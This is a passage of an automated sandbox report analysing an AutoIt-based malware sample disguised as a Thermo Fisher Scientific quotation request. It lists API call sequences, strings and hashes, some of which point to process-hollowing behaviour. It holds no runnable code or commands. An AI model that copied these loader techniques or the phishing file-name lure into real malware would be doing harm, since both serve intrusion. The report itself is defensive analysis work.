                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$edit
                                                              • API String ID: 1584632944-3779509399
                                                              • Opcode ID: 314d6a198099b7cfb25c57249da50265460e157dab0d2ad8585b4dab6d25e305
                                                              • Instruction ID: 1463be588c434e97b1240e93584f07da43f67a294aab23a864096d8dc9ec078e
                                                              • Opcode Fuzzy Hash: 314d6a198099b7cfb25c57249da50265460e157dab0d2ad8585b4dab6d25e305
                                                              • Instruction Fuzzy Hash: DEF0F4716402D47AEB315757AC08E773E7FEBC7F60F01111FBA04961B1C96508A5DAB0

                                                              Control-flow Graph: d4c378-d4c4f9 (calls d49fc8, d4c268, CreateFileW, VirtualAlloc, ReadFile, d4c2a8, d4b268, d4c2f8, ExitProcess)
                                                              APIs
                                                                • Part of subcall function 00D4C268: Sleep.KERNELBASE(000001F4), ref: 00D4C279
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D4C4EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateFileSleep
                                                              • String ID: 6OX4Z2F8MEINKKTJBSQ4M7A556YHOK
                                                              • API String ID: 2694422964-1931182647
                                                              • Opcode ID: 904d8ec4b3ba76680d4f5bb2bce241467c8feb49f925362bf2d26fa29bb686ce
                                                              • Instruction ID: ee89bd1eed896ae317552f9b857a1e6455d4ff9936165ea953fd84e3d5d56985
                                                              • Opcode Fuzzy Hash: 904d8ec4b3ba76680d4f5bb2bce241467c8feb49f925362bf2d26fa29bb686ce
                                                              • Instruction Fuzzy Hash: 26718C30D14288DBEF11CBA4C8447EEBB75AF19304F044199E648BB2C1DBBA5A49CB76

                                                              APIs
                                                                • Part of subcall function 00605374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006C1148,?,006061FF,?,00000000,00000001,00000000), ref: 00605392
                                                                • Part of subcall function 006049FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00604A1D
                                                              • _wcscat.LIBCMT ref: 00672D80
                                                              • _wcscat.LIBCMT ref: 00672DB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileModuleNameOpen
                                                              • String ID: 8!l$\$\Include\
                                                              • API String ID: 3592542968-4245525183
                                                              • Opcode ID: 41fc989bd4ec3fb0dd06745802b4f883fcced18050a8e26c4c27ca58fef67e20
                                                              • Instruction ID: 34a721a07853ddac26976ef1fd28f8b82aea44b029f7cf58c0a15f6ef73a9459
                                                              • Opcode Fuzzy Hash: 41fc989bd4ec3fb0dd06745802b4f883fcced18050a8e26c4c27ca58fef67e20
                                                              • Instruction Fuzzy Hash: CC51A3B14043418FC758EF55E8A1CABB7FBBF59300B44552EFB45836A1DB709608CB56
                                                              APIs
                                                              • _memset.LIBCMT ref: 0060522F
                                                              • _wcscpy.LIBCMT ref: 00605283
                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00605293
                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00673CB0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                              • String ID: Line:
                                                              • API String ID: 1053898822-1585850449
                                                              • Opcode ID: ee81f209ba7474d6cd268005cba3661693c330150e23dc085bdd8e0c3b3468b2
                                                              • Instruction ID: f4c41b1ece66a53ac47b77c86b16ace3cc8da229d95042c7f0f4750e475f833d
                                                              • Opcode Fuzzy Hash: ee81f209ba7474d6cd268005cba3661693c330150e23dc085bdd8e0c3b3468b2
                                                              • Instruction Fuzzy Hash: 7D31D271148740AFD368EB50EC46FEB77DAAF46300F00451EF586961D2EB70A6588B9B
                                                              APIs
                                                                • Part of subcall function 006041A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,006039FE,?,00000001), ref: 006041DB
                                                              • _free.LIBCMT ref: 006736B7
                                                              • _free.LIBCMT ref: 006736FE
                                                                • Part of subcall function 0060C833: __wsplitpath.LIBCMT ref: 0060C93E
                                                                • Part of subcall function 0060C833: _wcscpy.LIBCMT ref: 0060C953
                                                                • Part of subcall function 0060C833: _wcscat.LIBCMT ref: 0060C968
                                                                • Part of subcall function 0060C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0060C978
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                              • API String ID: 805182592-1757145024
                                                              • Opcode ID: b7c78354bd156ac82d975828cc3193186234996361b98ffcc522e7f26747d713
                                                              • Instruction ID: ce083c93e6e926caeace54a9795ff660810fc4a00adb4d15c16a23b4bc5563ba
                                                              • Opcode Fuzzy Hash: b7c78354bd156ac82d975828cc3193186234996361b98ffcc522e7f26747d713
                                                              • Instruction Fuzzy Hash: D5917071950229AFCF58EFA4CC919EEB7B6BF18310F10842DF416AB391DB30AA45DB54
                                                              APIs
                                                              • _memset.LIBCMT ref: 00673725
                                                              • GetOpenFileNameW.COMDLG32 ref: 0067376F
                                                                • Part of subcall function 0060660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006053B1,?,?,006061FF,?,00000000,00000001,00000000), ref: 0060662F
                                                                • Part of subcall function 006040A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006040C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                              • String ID: X$t3k
                                                              • API String ID: 3777226403-2632078866
                                                              • Opcode ID: 2cd691a3e8636cf0c2913b34514f593272c26892f5b3ae344aadbebd99153e6d
                                                              • Instruction ID: 77717e296461ca1ec6c96c8283df67cca4e077ef7de0a8c16d6d86adcb599deb
                                                              • Opcode Fuzzy Hash: 2cd691a3e8636cf0c2913b34514f593272c26892f5b3ae344aadbebd99153e6d
                                                              • Instruction Fuzzy Hash: 1721D8B1A101989BCF55DF94D805BEF7BFA9F49300F00405DE505A7381DFB45A898F65
                                                              APIs
                                                              • __getstream.LIBCMT ref: 006234FE
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00623539
                                                              • __wopenfile.LIBCMT ref: 00623549
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                              • String ID: <G
                                                              • API String ID: 1820251861-2138716496
                                                              • Opcode ID: 8574d3911ae3923ca321900209b42b8175c739db8b1a2f2cf3525002bfa13168
                                                              • Instruction ID: 93ee7e710e40c7d46361c83c5c0c124d94ebc3e57f2995a7e18354f98952bcc0
                                                              • Opcode Fuzzy Hash: 8574d3911ae3923ca321900209b42b8175c739db8b1a2f2cf3525002bfa13168
                                                              • Instruction Fuzzy Hash: AB110DB0A00A369FDB51BF70BC426AE36E7AF05350B158969F415D7381EB38CA119F61
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0061D28B,SwapMouseButtons,00000004,?), ref: 0061D2BC
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0061D28B,SwapMouseButtons,00000004,?,?,?,?,0061C865), ref: 0061D2DD
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,0061D28B,SwapMouseButtons,00000004,?,?,?,?,0061C865), ref: 0061D2FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              • Opcode ID: 22d1e25021d922b60431c12b59af2b900dafee1d2fa561c957d34fb70f38c18f
                                                              • Instruction ID: af23386685a8880268c306be4f011f2bd67485f1549d00b24a54471c92b06653
                                                              • Opcode Fuzzy Hash: 22d1e25021d922b60431c12b59af2b900dafee1d2fa561c957d34fb70f38c18f
                                                              • Instruction Fuzzy Hash: C5117975611208BFDB218FA4CC84EEF7BB9EF09744F184569E901D7250E731AE819B60
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00D4BA23
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D4BAB9
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D4BADB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                              • Instruction ID: 50661809e072401d952d37ffd95d187509258767b723f3b2abce872003d8c096
                                                              • Opcode Fuzzy Hash: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                              • Instruction Fuzzy Hash: 4862FD30A14658DBEB24CFA4C851BDEB376EF68300F1091A9D10DEB394E7759E81CB69
                                                              APIs
                                                                • Part of subcall function 00604517: _fseek.LIBCMT ref: 0060452F
                                                                • Part of subcall function 0064C56D: _wcscmp.LIBCMT ref: 0064C65D
                                                                • Part of subcall function 0064C56D: _wcscmp.LIBCMT ref: 0064C670
                                                              • _free.LIBCMT ref: 0064C4DD
                                                              • _free.LIBCMT ref: 0064C4E4
                                                              • _free.LIBCMT ref: 0064C54F
                                                                • Part of subcall function 00621C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00627A85), ref: 00621CB1
                                                                • Part of subcall function 00621C9D: GetLastError.KERNEL32(00000000,?,00627A85), ref: 00621CC3
                                                              • _free.LIBCMT ref: 0064C557
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                              • String ID:
                                                              • API String ID: 1552873950-0
                                                              • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                              • Instruction ID: 6c00aa2fd6d2fb3d780cbddcb29c5c10652bbf2430165c431f564d0a46096ab8
                                                              • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                              • Instruction Fuzzy Hash: 975161B1D04218AFDB649F64DC81AAEBBBAEF48314F10409EB209A7341DB715A90CF58
                                                              APIs
                                                              • _memset.LIBCMT ref: 0061EBB2
                                                                • Part of subcall function 006051AF: _memset.LIBCMT ref: 0060522F
                                                                • Part of subcall function 006051AF: _wcscpy.LIBCMT ref: 00605283
                                                                • Part of subcall function 006051AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00605293
                                                              • KillTimer.USER32(?,00000001,?,?), ref: 0061EC07
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0061EC16
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00673C88
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                              • String ID:
                                                              • API String ID: 1378193009-0
                                                              • Opcode ID: fcbc156963efa22df03775652ddea075cd8e6b589c6530b7e5f5815da89562d5
                                                              • Instruction ID: c0a8a425cc1d1a7b25cda6ebb4c447b32e4b26f8d459391c5789cebbab46fa3d
                                                              • Opcode Fuzzy Hash: fcbc156963efa22df03775652ddea075cd8e6b589c6530b7e5f5815da89562d5
                                                              • Instruction Fuzzy Hash: C8210770504794AFE7339B288C55FE7BFEE9B11308F04048DE69E66382C3716A858B51
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 0064C72F
                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0064C746
                                                              Strings
                                                              Similarity
                                                              • API ID: Temp$FileNamePath
                                                              • String ID: aut
                                                              • API String ID: 3285503233-3010740371
                                                              • Opcode ID: c4e04b0e64da5e320160d5df70692f7bb9fd9e72ce9bece52ee99d76db3d2325
                                                              • Instruction ID: f9df400b3dc8f4f9f28c2c8401e35abd9a0bb0bd069d0c4591ff116c85749898
                                                              • Opcode Fuzzy Hash: c4e04b0e64da5e320160d5df70692f7bb9fd9e72ce9bece52ee99d76db3d2325
                                                              • Instruction Fuzzy Hash: 12D05E7150031EBBDB10AB90DC0EFCA776D9700704F0002A07750A50F1DAB0E7998B64
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c23cb88fab20d98c880eaad2c63daecfa46249a38c99482d04ad90ef65f11b6b
                                                              • Instruction ID: cca0501eb293461bdd42d5728ade30c5f3661c7daea5cb3859b9fafc1b1b2464
                                                              • Opcode Fuzzy Hash: c23cb88fab20d98c880eaad2c63daecfa46249a38c99482d04ad90ef65f11b6b
                                                              • Instruction Fuzzy Hash: A1F179716083019FC754DF24C881B5AB7E6FF88314F148A2EF9959B392DB30E949CB86
                                                              APIs
                                                              • _memset.LIBCMT ref: 00605022
                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 006050CB
                                                              Similarity
                                                              • API ID: IconNotifyShell__memset
                                                              • String ID:
                                                              • API String ID: 928536360-0
                                                              • Opcode ID: e4b3416fa19d8b72e8b48016e0b39cba81f0418b8a1c1993b41efc7868da361e
                                                              • Instruction ID: a1c3b05965c33de6b339fb74eb7b48d92d4156e80b32cfd643b4d0f9b7fe7cf3
                                                              • Opcode Fuzzy Hash: e4b3416fa19d8b72e8b48016e0b39cba81f0418b8a1c1993b41efc7868da361e
                                                              • Instruction Fuzzy Hash: BB317FB15047019FD725DF24D845AABBBE9FF49304F00092EE59B86381E771A944CFA6
                                                              APIs
                                                              • __FF_MSGBANNER.LIBCMT ref: 00623973
                                                                • Part of subcall function 006281C2: __NMSG_WRITE.LIBCMT ref: 006281E9
                                                                • Part of subcall function 006281C2: __NMSG_WRITE.LIBCMT ref: 006281F3
                                                              • __NMSG_WRITE.LIBCMT ref: 0062397A
                                                                • Part of subcall function 0062821F: GetModuleFileNameW.KERNEL32(00000000,006C0312,00000104,00000000,00000001,00000000), ref: 006282B1
                                                                • Part of subcall function 0062821F: ___crtMessageBoxW.LIBCMT ref: 0062835F
                                                                • Part of subcall function 00621145: ___crtCorExitProcess.LIBCMT ref: 0062114B
                                                                • Part of subcall function 00621145: ExitProcess.KERNEL32 ref: 00621154
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              • RtlAllocateHeap.NTDLL(00B90000,00000000,00000001,00000001,00000000,?,?,0061F507,?,0000000E), ref: 0062399F
                                                              Similarity
                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 1372826849-0
                                                              • Opcode ID: 80b2d093fef5aeb591fb58bef8f489634c2819c4253dd10d36e272d9727c3398
                                                              • Instruction ID: 4e1ebc301791f95de8b0873ea32b3995b17374abc516df824ce3fd83187a7dfd
                                                              • Opcode Fuzzy Hash: 80b2d093fef5aeb591fb58bef8f489634c2819c4253dd10d36e272d9727c3398
                                                              • Instruction Fuzzy Hash: 6001DB71745E319EE6513B34FC46B69234B9B83710F20102AF5059B3C2EBB49D814EA4
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0064C385,?,?,?,?,?,00000004), ref: 0064C6F2
                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0064C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0064C708
                                                              • CloseHandle.KERNEL32(00000000,?,0064C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0064C70F
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 558b19531e75512323c6794198df9814ba56f52c1a65fcb16a3f9c4ba6622fd0
                                                              • Instruction ID: b86ea9c1b65b8bbc83c01fb2708fd5fd42a74259efb2b417b6c28e6a6bea0fec
                                                              • Opcode Fuzzy Hash: 558b19531e75512323c6794198df9814ba56f52c1a65fcb16a3f9c4ba6622fd0
                                                              • Instruction Fuzzy Hash: 04E08632141214B7D7212B54AC0DFCA7F1AAF05770F104210FB54691E097B1291187A8
                                                              APIs
                                                              • _free.LIBCMT ref: 0064BB72
                                                                • Part of subcall function 00621C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00627A85), ref: 00621CB1
                                                                • Part of subcall function 00621C9D: GetLastError.KERNEL32(00000000,?,00627A85), ref: 00621CC3
                                                              • _free.LIBCMT ref: 0064BB83
                                                              • _free.LIBCMT ref: 0064BB95
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                              • Instruction ID: 413dae6b33654a88552dd972c3cee7dd6a39056a041dde732443ac06df5353fa
                                                              • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                              • Instruction Fuzzy Hash: ECE0C2A1304B1182CB206538BE44EF313CD8F15310B04180DB459EB242CF28F84088A8
                                                              APIs
                                                                • Part of subcall function 006022A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,006024F1), ref: 00602303
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006025A1
                                                              • CoInitialize.OLE32(00000000), ref: 00602618
                                                              • CloseHandle.KERNEL32(00000000), ref: 0067503A
                                                              Similarity
                                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID:
                                                              • API String ID: 3815369404-0
                                                              • Opcode ID: 7d9d47022237f2cbb54162f15673ea2e627471945a3b2c51b84b276653d6ff2d
                                                              • Instruction ID: 90fe17eac5d09c53aea3163816ec2eb0476cf81ec4a4cfd08a3331eea5bdb0ef
                                                              • Opcode Fuzzy Hash: 7d9d47022237f2cbb54162f15673ea2e627471945a3b2c51b84b276653d6ff2d
                                                              • Instruction Fuzzy Hash: 1571C3B88012858BC348EF5AA994D75BBE7FB5B344794612ED109CF6B3C7388690CF58
                                                              APIs
                                                              • IsThemeActive.UXTHEME ref: 00603A73
                                                                • Part of subcall function 00621405: __lock.LIBCMT ref: 0062140B
                                                                • Part of subcall function 00603ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00603AF3
                                                                • Part of subcall function 00603ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00603B08
                                                                • Part of subcall function 00603D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00603AA3,?), ref: 00603D45
                                                                • Part of subcall function 00603D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00603AA3,?), ref: 00603D57
                                                                • Part of subcall function 00603D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,006C1148,006C1130,?,?,?,?,00603AA3,?), ref: 00603DC8
                                                                • Part of subcall function 00603D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00603AA3,?), ref: 00603E48
                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00603AB3
                                                              Similarity
                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                              • String ID:
                                                              • API String ID: 924797094-0
                                                              • Opcode ID: ee0fdce689e41784b42a0666f586fc480f0fe320d9478a6f50a9135cbac66b7c
                                                              • Instruction ID: c15fb5281299db37683bc8141f181b59b46910860d44c84fca1c730626a197be
                                                              • Opcode Fuzzy Hash: ee0fdce689e41784b42a0666f586fc480f0fe320d9478a6f50a9135cbac66b7c
                                                              • Instruction Fuzzy Hash: 2911C0716083519FC300EF29EC0591ABBEBEF96310F00991FF9858B2A2DB708590CBD6
                                                              APIs
                                                              • ___lock_fhandle.LIBCMT ref: 0062EA29
                                                              • __close_nolock.LIBCMT ref: 0062EA42
                                                                • Part of subcall function 00627BDA: __getptd_noexit.LIBCMT ref: 00627BDA
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              Similarity
                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                              • String ID:
                                                              • API String ID: 1046115767-0
                                                              • Opcode ID: 5b6cbc9214b09ecf39f478e7c35dc2f24b7817ef791ad670cac7338295ce7a9d
                                                              • Instruction ID: 167a98aa0b80a5d5e8bb3739331690064d6d42334eb30a0636ad99529bf2c008
                                                              • Opcode Fuzzy Hash: 5b6cbc9214b09ecf39f478e7c35dc2f24b7817ef791ad670cac7338295ce7a9d
                                                              • Instruction Fuzzy Hash: AE11C6B2905E709ED751BF64F84175C3A536F41331F164358E4211F1E2CBB58C418FA9
                                                              APIs
                                                                • Part of subcall function 0062395C: __FF_MSGBANNER.LIBCMT ref: 00623973
                                                                • Part of subcall function 0062395C: __NMSG_WRITE.LIBCMT ref: 0062397A
                                                                • Part of subcall function 0062395C: RtlAllocateHeap.NTDLL(00B90000,00000000,00000001,00000001,00000000,?,?,0061F507,?,0000000E), ref: 0062399F
                                                              • std::exception::exception.LIBCMT ref: 0061F51E
                                                              • __CxxThrowException@8.LIBCMT ref: 0061F533
                                                                • Part of subcall function 00626805: RaiseException.KERNEL32(?,?,0000000E,006B6A30,?,?,?,0061F538,0000000E,006B6A30,?,00000001), ref: 00626856
                                                              Similarity
                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3902256705-0
                                                              • Opcode ID: a282f762cf73e6dc8ef2cecde536aec33549eb85f694025eca7e10a9fdc54287
                                                              • Instruction ID: 7e9027a27fe594bb5672f1a8c823c48aa5d8527cc682b043ba48a1e61508b062
